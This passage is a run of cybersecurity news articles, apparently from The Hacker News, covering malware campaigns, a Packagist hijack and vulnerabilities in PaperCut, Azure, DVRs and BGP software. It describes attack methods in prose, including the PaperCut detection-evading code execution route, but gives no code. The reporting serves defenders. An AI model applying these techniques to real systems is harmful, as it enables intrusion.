The attack chain begins with a certified email (or PEC email) in an attempt to lull victims into a false sense of security. These phishing emails come bearing an executable file that acts as a downloader for a malware called sLoad (aka Starslord loader).
A PowerShell loader, sLoad is a reconnaissance tool that collects and exfiltrates information from the compromised host, with the purpose of assessing the target and dropping a more significant payload like Ramnit if the target is deemed profitable.
"This 'enrichment phase' could continue for days or weeks, depending on the number of infected machines," Cleafy noted. "Additional data will be exfiltrated to make the resulting botnet more and more solid and consistent."
sLoad also leverages living-off-the-land (LotL) techniques by abusing legitimate Windows tools like PowerShell and BITSAdmin as part of its evasion mechanisms.
Another characteristic of the malware is its ability to check against a predefined list of corporate banking institutions to determine if the hacked workstation is one among the targets, and if so, proceed with the infection.
"All the bots that successfully pass those steps will be selected by botnet operators and considered as 'new candidates' for banking fraud operations moving forward to the next stage, where Ramnit, one of the most advanced banking trojans, will be installed," the researchers said.
N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks
5.5.23 BigBrothers The Hacker News
The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign.
"[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said.
Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima.
Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe.
The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferation to activate the infection sequence.
"Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood of opening by the target," the researchers said. "This includes proper formatting, grammar, and visual clues, appearing legitimate to unsuspecting users."
ReconShark
These messages contain links to booby-trapped Microsoft Word documents hosted on OneDrive to deploy ReconShark, which chiefly functions as a recon tool to execute instructions sent from an actor-controlled server. It's also an evolution of the threat actor's BabyShark malware toolset.
"It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator," Palo Alto Networks Unit 42 said in its analysis of BabyShark in February 2019.
ReconShark is specifically designed to exfiltrate details about running processes, deployed detection mechanisms and hardware information, suggesting that data gathered from the tool is used to carry out "precision attacks" involving malware tailored to the targeted environment in a manner that sidesteps detection.
The malware is also capable of deploying additional payloads from the server based on "what detection mechanism processes run on infected machines."
The findings add to growing evidence that the threat actor is actively shifting its tactics to get a foothold on compromised hosts, establish persistence, and stealthily gather intelligence for extended periods of time.
"The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape," SentinelOne said.
Packagist Repository Hacked: Over a Dozen PHP Packages with 500 Million Compromised
5.5.23 Hacking The Hacker News
PHP software package repository Packagist revealed that an "attacker" gained access to four inactive accounts on the platform to hijack over a dozen packages with over 500 million installs to date.
"The attacker forked each of the packages and replaced the package description in composer.json with their own message but did not otherwise make any malicious changes," Packagist's Nils Adermann said. "The package URLs were then changed to point to the forked repositories."
The four user accounts are said to have had access to a total of 14 packages, including multiple Doctrine packages. The incident took place on May 1, 2023. The complete list of impacted packages is as follows -
acmephp/acmephp
acmephp/core
acmephp/ssl
doctrine/doctrine-cache-bundle
doctrine/doctrine-module
doctrine/doctrine-mongo-odm-module
doctrine/doctrine-orm-module
doctrine/instantiator
growthbook/growthbook
jdorn/file-system-cache
jdorn/sql-formatter
khanamiryan/qrcode-detector-decoder
object-calisthenics/phpcs-calisthenics-rules
tga/simhash-php
Security researcher Ax Sharma, writing for Bleeping Computer, revealed that the changes were made by an anonymous penetration tester with the pseudonym "neskafe3v1" in an attempt to land a job.
The attack chain, in a nutshell, made it possible to modify the Packagist page for each of these packages to a namesake GitHub repository, effectively altering the installation workflow used within Composer environments.
Successful exploitation meant that developers downloading the packages would get the forked version as opposed to the actual contents.
Packagist said that no additional malicious changes were distributed, and that all the accounts were disabled and their packages restored on May 2, 2023. It's also urging users to enable two-factor authentication (2FA) to secure their accounts.
"All four accounts appear to have been using shared passwords leaked in previous incidents on other platforms," Adermann noted. "Please, do not reuse passwords."
The development comes as cloud security firm Aqua identified thousands of exposed cloud software registries and repositories containing more than 250 million artifacts and over 65,000 container images.
The misconfigurations stem from mistakenly connecting registries to the internet, allowing anonymous access by design, using default passwords, and granting upload privileges to users that could be abused to poison the registry with malicious code.
"In some of these cases, anonymous user access allowed a potential attacker to gain sensitive information, such as secrets, keys, and passwords, which could lead to a severe software supply chain attack and poisoning of the software development life cycle (SDLC)," researchers Mor Weinberger and Assaf Morag disclosed late last month.
Fleckpe Android Malware Sneaks onto Google Play Store with Over 620,000 Downloads
5.5.23 Android The Hacker News
A new Android subscription malware named Fleckpe has been unearthed on the Google Play Store, amassing more than 620,000 downloads in total since 2022.
Kaspersky, which identified 11 apps on the official app storefront, said the malware masqueraded as legitimate photo editing apps, camera, and smartphone wallpaper packs. The apps have since been taken down.
The operation primarily targets users from Thailand, although telemetry data gathered by the Russian cybersecurity firm has revealed victims in Poland, Malaysia, Indonesia, and Singapore.
The apps further offer the promised functionality to avoid raising red flags, but conceal their real purpose under the hood. The list of the offending apps is as follows -
Beauty Camera Plus (com.beauty.camera.plus.photoeditor)
Beauty Photo Camera (com.apps.camera.photos)
Beauty Slimming Photo Editor (com.beauty.slimming.pro)
Fingertip Graffiti (com.draw.graffiti)
GIF Camera Editor (com.gif.camera.editor)
HD 4K Wallpaper (com.hd.h4ks.wallpaper)
Impressionism Pro Camera (com.impressionism.prozs.app)
Microclip Video Editor (com.microclip.vodeoeditor)
Night Mode Camera Pro (com.urox.opixe.nightcamreapro)
Photo Camera Editor (com.toolbox.photoeditor)
Photo Effect Editor (com.picture.pictureframe)
"When the app starts, it loads a heavily obfuscated native library containing a malicious dropper that decrypts and runs a payload from the app assets," Kaspersky researcher Dmitry Kalinin said.
The payload, for its part, is designed to contact a remote server and transmit information about the compromised device (e.g., Mobile Country Code and Mobile Network Code), following which the server responds back with a paid subscription page.
The malware subsequently opens the page in an invisible web browser window and attempts to subscribe on the user's behalf by abusing its permissions to access notifications and obtain the confirmation code required to complete the step.
In a sign that Fleckpe is being actively developed, recent versions of the malware have moved most of the malicious functionality to the native library in a bid to evade detection by security tools.
"The payload now only intercepts notifications and views web pages, acting as a bridge between the native code and the Android components required for purchasing a subscription," Kalinin noted.
"Unlike the native library, the payload has next to no evasion capabilities, although the malicious actors did add some code obfuscation to the latest version."
This is not the first time subscription malware has been found on the Google Play Store. Fleckpe joins other fleeceware families like Joker (aka Bread or Jocker) and Harly, which subscribe infected devices to unwanted premium services and conduct billing fraud.
While such apps are not as dangerous as spyware or financial trojans, they can still incur unauthorized charges and be repurposed by its operators to harvest a wide range of sensitive information and serve as entry points for more nefarious malware.
If anything, the findings are yet another indication that threat actors are continuing to discover new ways to sneak their apps onto official app marketplaces to scale their campaigns, requiring that users exercise caution when downloading apps and granting permissions to them.
"Growing complexity of the trojans has allowed them to successfully bypass many anti-malware checks implemented by the marketplaces, remaining undetected for long periods of time," Kalinin said.
Cisco Warns of Vulnerability in Popular Phone Adapter, Urges Migration to Newer Model
5.5.23 Vulnerebility The Hacker News
Cisco has warned of a critical security flaw in SPA112 2-Port Phone Adapters that it said could be exploited by a remote attacker to execute arbitrary code on affected devices.
The issue, tracked as CVE-2023-20126, is rated 9.8 out of a maximum of 10 on the CVSS scoring system. The company credited Catalpa of DBappSecurity for reporting the shortcoming.
The product in question makes it possible to connect analog phones and fax machines to a VoIP service provider without requiring an upgrade.
"This vulnerability is due to a missing authentication process within the firmware upgrade function," the company said in a bulletin.
"An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges."
Despite the severity of the flaw, the networking equipment maker said it does not intend to release fixes due to the fact the devices have reached end-of-life (EoL) status as of June 1, 2020.
It instead is recommending that users migrate to a Cisco ATA 190 Series Analog Telephone Adapter, which is set to receive its last update on March 31, 2024. There is no evidence that the flaw has been maliciously exploited in the wild.
Researchers Discover 3 Vulnerabilities in Microsoft Azure API Management Service
5.5.23 Vulnerebility The Hacker News
Three new security flaws have been disclosed in Microsoft Azure API Management service that could be abused by malicious actors to gain access to sensitive information or backend services.
This includes two server-side request forgery (SSRF) flaws and one instance of unrestricted file upload functionality in the API Management developer portal, according to Israeli cloud security firm Ermetic.
"By abusing the SSRF vulnerabilities, attackers could send requests from the service's CORS Proxy and the hosting proxy itself, access internal Azure assets, deny service and bypass web application firewalls," security researcher Liv Matan said in a report shared with The Hacker News.
"With the file upload path traversal, attackers could upload malicious files to Azure's hosted internal workload."
Azure API Management is a multicloud management platform that allows organizations to securely expose their APIs to external and internal customers and enable a wide range of connected experiences.
Of the two SSRF flaws identified by Ermetic, one of them is a bypass for a fix put in place by Microsoft to address a similar vulnerability reported by Orca earlier this year. The other vulnerability resides in the API Management proxy function.
Exploitation of SSRF flaws can result in loss of confidentiality and integrity, permitting a threat actor to read internal Azure resources and execute unauthorized code.
The path traversal flaw discovered in the developer portal, on the other hand, stems from a lack of validation of the file type and path of the files uploaded.
An authenticated user can leverage this loophole to upload malicious files to the developer portal server and potentially even execute arbitrary code on the underlying system.
Following responsible disclosure, all the three flaws have been patched by Microsoft.
The findings come weeks after researchers from Orca detailed a "by-design flaw" in Microsoft Azure could be exploited by attackers to gain access to storage accounts, move laterally in the environment, and even execute remote code.
It also follows the discovery of another Azure vulnerability dubbed EmojiDeploy that could enable an attacker to seize control of a targeted application.
Researchers Uncover New Exploit for PaperCut Vulnerability That Can Bypass Detection
5.5.23 Exploit The Hacker News
Cybersecurity researchers have found a way to exploit a recently disclosed critical flaw in PaperCut servers in a manner that bypasses all current detections.
Tracked as CVE-2023-27350 (CVSS score: 9.8), the issue affects PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
While the flaw was patched by the Australian company on March 8, 2023, the first signs of active exploitation emerged on April 13, 2023.
Since then, the vulnerability has been weaponized by multiple threat groups, including ransomware actors, with post-exploitation activity resulting in the execution of PowerShell commands designed to drop additional payloads.
Now, VulnCheck has published a proof-of-concept (PoC) exploit that sidesteps existing detection signatures by leveraging the fact that "PaperCut NG and MF offer multiple paths to code execution."
It's worth noting that public exploits for the flaw use the PaperCut printer scripting interface to either execute Windows commands or drop a malicious Java archive (JAR) file.
Both these approaches, per VulnCheck, leave distinct footprints in the Windows System Monitor (aka Sysmon) service and the server's log file, not to mention trigger network signatures that can detect the authentication bypass.
But the Massachusetts-based threat Intelligence firm said it discovered a new method that abuses the print management software's "User/Group Sync" feature, which makes it possible to synchronize user and group information from Active Directory, LDAP, or a custom source.
When opting for a custom directory source, users can also specify a custom authentication program to validate a user's username and password. Interestingly, the user and auth programs can be any executable, although the auth program has to be interactive in nature.
The PoC exploit devised by VulnCheck banks on the auth program set as "/usr/sbin/python3" for Linux and "C:\Windows\System32\ftp.exe" for Windows. All an attacker then needs to execute arbitrary code is to provide a malicious username and password during a login attempt, the company said.
The attack method could be exploited to launch a Python reverse shell on Linux or download a custom reverse shell hosted on a remote server in Windows without activating any of the known detections.
"An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution," VulnCheck security researcher Jacob Baines pointed out.
"Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks. Attackers learn from defenders' public detections, so it's the defenders' responsibility to produce robust detections that aren't easily bypassed."
Meta Uncovers Massive Social Media Cyber Espionage Operations Across South Asia
4.5.23 Social The Hacker News
Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.
"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information security officer at Meta, said. "This investment in social engineering meant that these threat actors did not have to invest as much on the malware side."
The fake accounts, in addition to using traditional lures like women looking for a romantic connection, masqueraded as recruiters, journalists, or military personnel.
At least two of the cyber espionage efforts entailed the use of low-sophistication malware with reduced capabilities, likely in an attempt to get past app verification checks established by Apple and Google.
One of the groups that came under Meta's radar is a Pakistan-based advanced persistent threat (APT) group that relied on a network of 120 accounts on Facebook and Instagram and rogue apps and websites to infect military personnel in India and among the Pakistan Air Force with GravityRAT under the guise of cloud storage and entertainment apps.
The tech giant also expunged about 110 accounts on Facebook and Instagram linked to an APT identified as Bahamut that targeted activists, government employees, and military staff in India and Pakistan with Android malware published in the Google Play Store. The apps, which posed as secure chat or VPN apps, have since been removed.
Lastly, it purged 50 accounts on Facebook and Instagram tied to an India-based threat actor dubbed Patchwork, which took advantage of malicious apps uploaded to the Play Store to harvest data from victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.
Also disrupted by meta are six adversarial networks from the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo that engaged in what it called "coordinated inauthentic behavior" on Facebook and other social media platforms like Twitter, Telegram, YouTube, Medium, TikTok, Blogspot, Reddit, and WordPress.
All these geographically dispersed networks are said to have set up fraudulent news media brands, hacktivist groups, and NGOs to build credibility, with three of them linked to a U.S.-based marketing firm named Predictvia, a political marketing consultancy in Togo known as the Groupe Panafricain pour le Commerce et l'Investissement (GPCI), and Georgia's Strategic Communications Department.
Two networks that originated from China operated dozens of fraudulent accounts, pages, and groups across Facebook and Instagram to target users in India, Tibet, Taiwan, Japan, and the Uyghur community.
In both instances, Meta said it took down the activities before they could "build an audience" on its services, adding it found associations connecting one network to individuals associated with a Chinese IT firm referred to as Xi'an Tianwendian Network Technology.
The network from Iran, per the social media giant, primarily singled out Israel, Bahrain, and France, corroborating an earlier assessment from Microsoft about Iran's involvement in the hacking of the French satirical magazine Charlie Hebdo in January 2023.
"The people behind this network used fake accounts to post, like and share their own content to make it appear more popular than it was, as well as to manage Pages and Groups posing as hacktivist teams," Meta said. "They also liked and shared other people's posts about cyber security topics, likely to make fake accounts look more credible."
The disclosure also coincides with a new report from Microsoft, which revealed that Iranian state-aligned actors are increasingly relying on cyber-enabled influence operations to "boost, exaggerate, or compensate for shortcoming in their network access or cyberattack capabilities" since June 2022.
The Iranian government has been linked by Redmond to 24 such operations in 2022, up from seven in 2021, including clusters tracked as Moses Staff, Homeland Justice, Abraham's Ax, Holy Souls, and DarkBit. Seventeen of the operations have taken place since June 2022.
The Windows maker further said it observed "multiple Iranian actors attempting to use bulk SMS messaging in three cases in the second half of 2022, likely to enhance the amplification and psychological effects of their cyber-influence operations."
The shift in tactics is also characterized by the rapid exploitation of known security flaws, use of victim websites for command-and-control, and adoption of bespoke implants to avoid detection and steal information from victims.
The operations, which have singled out Israel and the U.S. as a retaliation for allegedly fomenting unrest in the nation, have sought to bolster Palestinian resistance, instigate unrest in Bahrain, and counter the normalization of Arab-Israeli relations.
Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts
4.5.23 Virus The Hacker News
Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.
The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts.
"Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said. "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware."
The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in Vietnam.
Trend Micro, in a series of tweets last week, detailed an information stealer that's disguised as a Windows desktop client for ChatGPT to extract passwords, session cookies, and history from Chromium-powered browsers. The company said the malware shares similarities with Ducktail.
Besides ChatGPT, threat actors have also been observed shifting to other "hot-button issues and popular topics" like Google Bard, TikTok marketing tools, pirated software and movies, and Windows utilities to dupe people into clicking on bogus links.
"These changes are likely an attempt by threat actors to ensure that any one service has only limited visibility into the entire operation," Guy Rosen, chief information security officer at Meta, said.
The attack chains are primarily engineered to target the personal accounts of users who manage or are connected to business pages and advertising accounts on Facebook.
Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello.
Ducktail isn't the only stealer malware detected in the wild, for Meta disclosed that it uncovered another novel strain dubbed NodeStealer that's capable of plundering cookies and passwords from web browsers to ultimately compromise Facebook, Gmail, and Outlook accounts.
The malware is assessed to be of Vietnamese origin, with Meta noting that it "took action to disrupt it and help people who may have been targeted to recover their accounts" within two weeks of it being deployed in late January 2023.
Samples analyzed by the Menlo Park-based company show that NodeStealer binary is distributed via Windows executables disguised as PDF and XLSX files with filenames relating to marketing and monthly budgets. The files, when opened, deliver JavaScript code that's designed to exfiltrate sensitive data from Chromium-based browsers.
NodeStealer gets its name from the use of the Node.js cross-platform JavaScript runtime environment, which is bundled along with the main payload, to set up persistence and execute the malware. No new artifacts have been identified as of February 27, 2023.
"After retrieving the Facebook credentials from the target's browser data, the malware uses it to make several unauthorized requests to Facebook URLs to enumerate account information related to advertising," Meta said. "The stolen information then enables the threat actor to assess and then use users' advertising accounts to run unauthorized ads."
In an attempt to slip under the radar of the company's anti-abuse systems, the rogue requests are made from the targeted user's device to the Facebook APIs, lending a veneer of legitimacy to the activity.
To counter such threats, Meta said it's launching a new support tool that guides users to identify and remove malware, enable businesses to verify connected Business Manager accounts, and require additional authentication when accessing a credit line or changing business administrators.
Google Introduces Passwordless Secure Sign-In with Passkeys for Google Accounts
4.5.23 Security The Hacker News
Almost five months after Google added support for passkeys to its Chrome browser, the tech giant has begun rolling out the passwordless solution across Google Accounts on all platforms.
Passkeys, backed by the FIDO Alliance, are a more secure way to sign in to apps and websites without having to use a traditional password. This, in turn, can be achieved by simply unlocking their computer or mobile device with their biometrics (e.g., fingerprint or facial recognition) or a local PIN.
"And, unlike passwords, passkeys are resistant to online attacks like phishing, making them more secure than things like SMS one-time codes," Google noted.
Passkeys, once created, are locally stored on the device, and are not shared with any other party. This also obviates the need for setting up two-factor authentication, as it proves that "you have access to your device and are able to unlock it."
Users also have the choice of creating passkeys for every device they use to login to Google Account. That said, a passkey created on one device will be synced to all the users' other devices running the same operating system platform (i.e., Android, iOS/macOS, or Windows) and if they are signed in to the same account. Viewed in that light, passkeys are not truly interoperable.
It's worth pointing out that both Google Password Manager and iCloud Keychain use end-to-end encryption to keep the passkeys private, thereby preventing users from getting locked out should they lose access to their devices or making it easier to upgrade from one device to another.
Additionally, users can sign in on a new device or temporarily use a different device by selecting the option to "use a passkey from another device," which then uses the phone's screen lock and proximity to approve a one-time sign-in.
"The device then verifies that your phone is in proximity using a small anonymous Bluetooth message and sets up an end-to-end encrypted connection to the phone through the internet," the company explained.
"The phone uses this connection to deliver your one-time passkey signature, which requires your approval and the biometric or screen lock step on the phone. Neither the passkey itself nor the screen lock information is sent to the new device."
While this may be the "beginning of the end of the password," the company said it intends to continue to support existing login methods like passwords and two-factor authentication for the foreseeable future.
Google is also recommending that users do not create passkeys on devices that are shared with others, a move that could effectively undermine all its security protections.
Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics
4.5.23 Virus The Hacker News
A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity.
Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO or Winnti) and shares overlaps with various other clusters known as Earth Baku, SparklingGoblin, and GroupCC.
Earth Longzhi was first documented by the cybersecurity firm in November 2022, detailing its attacks against various organizations located in East and Southeast Asia as well as Ukraine.
Attack chains mounted by the threat actor leverage vulnerable public-facing applications as entry points to deploy the BEHINDER web shell, and then leverage that access to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader.
"This recent campaign [...] abuses a Windows Defender executable to perform DLL sideloading while also exploiting a vulnerable driver, zamguard.sys, to disable security products installed on the hosts via a bring your own vulnerable driver (BYOVD) attack," Trend Micro said.
It's by no means the first time Earth Longzhi has leveraged the BYOVD technique, what with previous campaigns utilizing the vulnerable RTCore64.sys driver to restrict the execution of security products.
The malware, dubbed SPHijacker, also employs a second method referred to as "stack rumbling" to achieve the same objective, which entails making Windows Registry changes to interrupt the process execution flow and deliberately cause the targeted applications to crash upon launch.
"This technique is a type of [denial-of-service] attack that abuses undocumented MinimumStackCommitInBytes values in the [Image File Execution Options] registry key," Trend Micro explained.
"The value of MinimumStackCommitInBytes associated with a specific process in the IFEO registry key will be used to define the minimum size of stack to commit in initializing the main thread. If the stack size is too large, it will trigger a stack overflow exception and terminate the current process."
The twin approaches are far from the only methods that can be used to impair security products. Deep Instinct, last month, detailed a new code injection technique christened Dirty Vanity that exploits the remote forking mechanism in Windows to blindside endpoint detection systems.
What's more, the driver payload is installed as a kernel-level service using Microsoft Remote Procedure Call (RPC) as opposed to Windows APIs to evade detection.
Also observed in the attacks is the use of a DLL-based dropper named Roxwrapper to deliver another Cobalt Strike loader labeled BigpipeLoader as well as a privilege escalation tool (dwm.exe) that abuses the Windows Task Scheduler to launch a given payload with SYSTEM privileges.
The specified payload, dllhost.exe, is a downloader that's capable of retrieving next-stage malware from an actor-controlled server.
It's worth pointing out here that dwm.exe is based on an open source proof-of-concept (PoC) available on GitHub, suggesting that the threat actor is drawing inspiration from existing programs to hone its malware arsenal.
Trend Micro further said it identified decoy documents written in Vietnamese and Indonesian, indicating potential attempts to target users in the two countries in the future.
"Earth Longzhi remains active and continues to improve its tactics, techniques, and procedures (TTPs)," security researchers Ted Lee and Hara Hiroaki noted. "Organizations should stay vigilant against the continuous development of new stealthy schemes by cybercriminals."
Operation SpecTor: $53.4 Million Seized, 288 Vendors Arrested in Dark Web Drug Bust
3.5.23 Crime The Hacker News
An international law enforcement operation has resulted in the arrest of 288 vendors who are believed to be involved in drug trafficking on the dark web, adding to a long list of criminal enterprises that have been shuttered in recent years.
The effort, codenamed Operation SpecTor, also saw the authorities confiscating more than $53.4 million in cash and virtual currencies, 850 kg of drugs, and 117 firearms.
The largest number of arrests were made in the U.S. (153), followed by the U.K. (55), Germany (52), the Netherlands (10), Austria (9), France (5), Switzerland (2), Poland (1), and Brazil (1).
"This represents the most funds seized and the highest number of arrests in any coordinated international action," U.S. Attorney General Merrick B. Garland said. "The drug traffickers are confident that, by operating anonymously on the dark web, they can operate outside the bounds of the law. They are wrong."
The arrests stem from evidence gathered after the takedown of the Monopoly marketplace by German authorities in December 2021. DarkDotFail, in early January 2022, revealed that the criminal bazaar's servers were likely seized by law enforcement, although there was no official announcement.
"The vendors arrested as a result of the police action against Monopoly Market were also active on other illicit marketplaces, further impeding the trade of drugs and illicit goods on the dark web," Europol said in a statement.
"As a result, 288 vendors and buyers who engaged in tens of thousands of sales of illicit goods were arrested across Europe, the United States, and Brazil."
Europol said a number of these apprehended individuals were considered as high-value targets, adding law enforcement agencies gained access to the vendors' extensive buyer lists, potentially exposing "thousands of customers" who are now at risk of prosecution.
Operation SpecTor is a successor to DisrupTor and DarkHunTor, which led to the arrest of 329 alleged suspects in 2020 and 2021 for buying, selling, and coordinating the sale of outlawed goods across underground marketplaces and shops.
The development also comes as the U.S. Federal Bureau of Investigation (FBI) and the National Police of Ukraine seized nine virtual currency exchanges for knowingly offering cryptocurrency conversion services to criminal actors responsible for ransomware and other scams.
"These nine seized domains, 24xbtc.com, 100btc.pro, pridechange.com, 101crypta.com, uxbtc.com, trust-exchange.org, bitcoin24.exchange, paybtc.pro, and owl.gold offered anonymous cryptocurrency exchange services to website visitors," the Justice Department said.
The dismantling is part of a broader effort undertaken by governments in Europe and the U.S. to target infrastructure used by malicious actors to launder illegal proceeds and obscure the money trails.
Apple and Google Join Forces to Stop Unauthorized Tracking Alert System
3.5.23 Security The Hacker News
Apple and Google have teamed up to work on a draft industry-wide specification that's designed to tackle safety risks and alert users when they are being tracked without their knowledge or permission using devices like AirTags.
"The first-of-its-kind specification will allow Bluetooth location-tracking devices to be compatible with unauthorized tracking detection and alerts across Android and iOS platforms," the companies said in a joint statement.
While these trackers are primarily designed to keep tabs on personal belongings like keys, wallets, luggage, and other items, such devices have also been abused by bad actors for criminal or nefarious purposes, including instances of stalking, harassment, and theft.
The goal is to standardize the alerting mechanisms and minimize opportunities for misuse across Bluetooth location-tracking devices from different vendors. To that end, Samsung, Tile, Chipolo, eufy Security, and Pebblebee have all come on board.
In doing so, tracking devices manufactured by the companies are required to adhere to a set of instructions and recommendations as well as notify users of any unauthorized tracking on iOS and Android devices.
"Formalizing a set of best practices for manufacturers will allow for scalable compatibility with unwanted tracking detection technologies on various smartphone platforms and improve privacy and security for individuals," according to the spec.
"Unwanted tracking detection can both detect and alert individuals that a location tracker separated from the owner's device is traveling with them, as well as provide means to find and disable the tracker."
A crucial aspect of the proposed specification is the use of a pairing registry, which contains verifiable (but obfuscated) identity information of the owner of an accessory (e.g., phone number or email address) along with the serial number of the accessory.
Besides retaining the data for a period of minimum 25 days after the device has been unpaired (at which point it's deleted), the pairing registry is made available to law enforcement upon submitting a valid request.
In addition, the specification mandates that trackers transition from a "near-owner" mode to a "separated" mode should it be no longer near an owner's paired device for more than 30 minutes.
The companies are soliciting feedback from interested parties, following which a production implementation of the specification for unwanted tracking alerts is expected to be released sometime by the end of the year on both mobile ecosystems.
The last time Apple and Google came together, it was to devise a system-level platform that utilizes Bluetooth low energy (BLE) beacons to allow for contact tracing during the COVID-19 pandemic without using location data.
Hackers Exploiting 5-year-old Unpatched Vulnerability in TBK DVR Devices
3.5.23 Vulnerebility The Hacker News
Threat actors are actively exploiting an unpatched five-year-old flaw impacting TBK digital video recording (DVR) devices, according to an advisory issued by Fortinet FortiGuard Labs.
The vulnerability in question is CVE-2018-9995 (CVSS score: 9.8), a critical authentication bypass issue that could be exploited by remote actors to gain elevated permissions.
"The 5-year-old vulnerability (CVE-2018-9995) is due to an error when handling a maliciously crafted HTTP cookie," Fortinet said in an outbreak alert on May 1, 2023. "A remote attacker may be able to exploit this flaw to bypass authentication and obtain administrative privileges eventually leading access to camera video feeds."
The network security company said it observed over 50,000 attempts to exploit TBK DVR devices using the flaw in the month of April 2023. Despite the availability of a proof-of-concept (PoC) exploit, there are no fixes that address the vulnerability.
The flaw impacts TBK DVR4104 and DVR4216 product lines, which are also rebranded and sold using the names CeNova, DVR Login, HVR Login, MDVR Login, Night OWL, Novo, QSee, Pulnix, Securus, and XVR 5 in 1.
Additionally, Fortinet warned of a surge in the exploitation of CVE-2016-20016 (CVSS score: 9.8), another critical vulnerability affecting MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE.
The flaw could permit a remote unauthenticated attacker to execute arbitrary operating system commands as root due to the presence of a web shell that is accessible over a /shell URI.
"With tens of thousands of TBK DVRs available under different brands, publicly-available PoC code, and an easy-to-exploit makes this vulnerability an easy target for attackers," Fortinet noted. "The recent spike in IPS detections shows that network camera devices remain a popular target for attackers."
CISA Issues Advisory on Critical RCE Affecting ME RTU Remote Terminal Units
3.5.23 Vulnerebility The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an Industrial Control Systems (ICS) advisory about a critical flaw affecting ME RTU remote terminal units.
The security vulnerability, tracked as CVE-2023-2131, has received the highest severity rating of 10.0 on the CVSS scoring system for its low attack complexity.
"Successful exploitation of this vulnerability could allow remote code execution," CISA said, describing it as a case of command injection affecting versions of INEA ME RTU firmware prior to version 3.36.
Security researcher Floris Hendriks of Radboud University has been credited with reporting the issue to CISA.
Also published by CISA is an alert related to multiple known security holes in Intel(R) processors impacting Factory Automation (FA) products from Mitsubishi Electric that could result in privilege escalation and a denial-of-service (DoS) condition.
The development comes as the agency recommended critical infrastructure organizations to take necessary steps to secure the supply chains by reviewing the Federal Communications Commission's (FCC) Covered List of communications equipment that are deemed a national security risk.
CISA has also urged entities to adopt guidance issued by NIST to identify, assess, and mitigate supply chain risks, and enroll for the agency's free Vulnerability Scanning service to pinpoint vulnerable and high-risk devices.
It further follows efforts undertaken by cybersecurity authorities in Australia, Canada, United Kingdom, Germany, Netherlands, New Zealand, and the U.S. to "take urgent steps necessary to ship products that are secure-by-design and -default."
Researchers Uncover New BGP Flaws in Popular Internet Routing Protocol Software
3.5.23 Vulnerebility The Hacker News
Cybersecurity researchers have uncovered weaknesses in a software implementation of the Border Gateway Protocol (BGP) that could be weaponized to achieve a denial-of-service (DoS) condition on vulnerable BGP peers.
The three vulnerabilities reside in version 8.4 of FRRouting, a popular open source internet routing protocol suite for Linux and Unix platforms. It's currently used by several vendors like NVIDIA Cumulus, DENT, and SONiC, posing supply chain risks.
The discovery is the result of an analysis of seven different implementations of BGP carried out by Forescout Vedere Labs: FRRouting, BIRD, OpenBGPd, Mikrotik RouterOS, Juniper JunOS, Cisco IOS, and Arista EOS.
BGP is a gateway protocol that's designed to exchange routing and reachability information between autonomous systems. It's used to find the most efficient routes for delivering internet traffic.
The list of three flaws is as follows -
CVE-2022-40302 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message with an Extended Optional Parameters Length option.
CVE-2022-40318 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message with an Extended Optional Parameters Length option.
CVE-2022-43681 (CVSS score: 6.5) - Out-of-bounds read when processing a malformed BGP OPEN message that abruptly ends with the option length octet.
The issues "could be exploited by attackers to achieve a DoS condition on vulnerable BGP peers, thus dropping all BGP sessions and routing tables and rendering the peer unresponsive," the company said in a report shared with The Hacker News.
